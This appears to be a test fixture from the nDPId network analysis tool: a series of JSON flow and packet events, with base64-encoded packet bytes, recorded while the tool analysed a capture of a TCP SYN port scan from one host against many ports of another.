-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1306,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsinkAAC8GjvmsEAAIQA2GNIzTFajdU4MZAAAAAGACEAAS5AAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1317,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1307,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsvrkAADEGWLmsEAAIQA2GNIzTaXjdU4MZAAAAAGACCADHEwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1318,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1124,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1308,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsP2QAADMG1g6sEAAIQA2GNIzTBGTdU4MZAAAAAGACEAAkKAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1319,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1319,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1309,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/5IAAC0GG+CsEAAIQA2GNIzTDtjdU4MZAAAAAGACCAAhtAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1320,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1972,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1320,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1310,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAs3zQAADIGNz6sEAAIQA2GNIzTB7TdU4MZAAAAAGACDAAk2AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1321,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1311,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAs75sAADEGJ9esEAAIQA2GNIzTBCXdU4MZAAAAAGACCAAsZwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1322,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1322,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1312,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsr2oAADsGXgisEAAIQA2GNIzTAGrdU4MZAAAAAGACEAAoIgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1323,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1323,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1313,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsrmoAACcGcwisEAAIQA2GNIzTBBXdU4MZAAAAAGACEAAkdwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1324,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1314,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsTr8AACYG07OsEAAIQA2GNIzTBIvdU4MZAAAAAGACDAAoAQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1325,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAs6UAAADcGKDKsEAAIQA2GNIzTCirdU4MZAAAAAGACEAAeYgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1326,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1326,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1316,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAs4BwAAC0GO1asEAAIQA2GNIzTBd3dU4MZAAAAAGACCAAqrwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1327,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":38292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1327,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1317,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsWGcAACoGxgusEAAIQA2GNIzSlZTdUoMYAAAAAGACDACW+gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1328,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":416,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1328,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1318,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAshTcAADYGjTusEAAIQA2GNIzSAaDdUoMYAAAAAGACDAAq7wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1329,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1329,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1319,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsW+wAADIGuoasEAAIQA2GNIzSB87dUoMYAAAAAGACDAAkwQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1330,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1330,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAs4OUAADYGMY2sEAAIQA2GNIzSABTdUoMYAAAAAGACDAAsewAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1331,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1331,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1321,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsLA4AAC8G7WSsEAAIQA2GNIzSBQfdUoMYAAAAAGACEAAjiAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1332,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57294,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1332,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1322,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAs6oAAADEGLPKsEAAIQA2GNIzS387dUoMYAAAAAGACCABQwAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1333,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":541,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1333,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1323,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsfdcAACkGoZusEAAIQA2GNIzSAh3dUoMYAAAAAGACCAAucgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1334,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1334,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsPlkAADIG2BmsEAAIQA2GNIzSBUjdUoMYAAAAAGACDAAnRwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1335,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1335,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1325,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsE3cAACgGDPysEAAIQA2GNIzSDNPdUoMYAAAAAGACBAAnvAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1336,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1145,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1336,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1326,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsMosAADIG4+esEAAIQA2GNIzSBHndUoMYAAAAAGACDAAoFgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1337,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1337,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1327,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsv5AAADIGVuKsEAAIQA2GNIzSCI\/dUoMYAAAAAGACDAAkAAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1338,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1338,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAszeUAADsGP42sEAAIQA2GNIzSTiDdUoMYAAAAAGACEADabgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1339,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1339,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1329,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAs+zcAADMGGjusEAAIQA2GNIzSBAvdUoMYAAAAAGACEAAkhAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1340,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1340,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAsJtYAADsG5pysEAAIQA2GNIzSAFjdUoMYAAAAAGACEAAoNwAAAgQFtA=="} 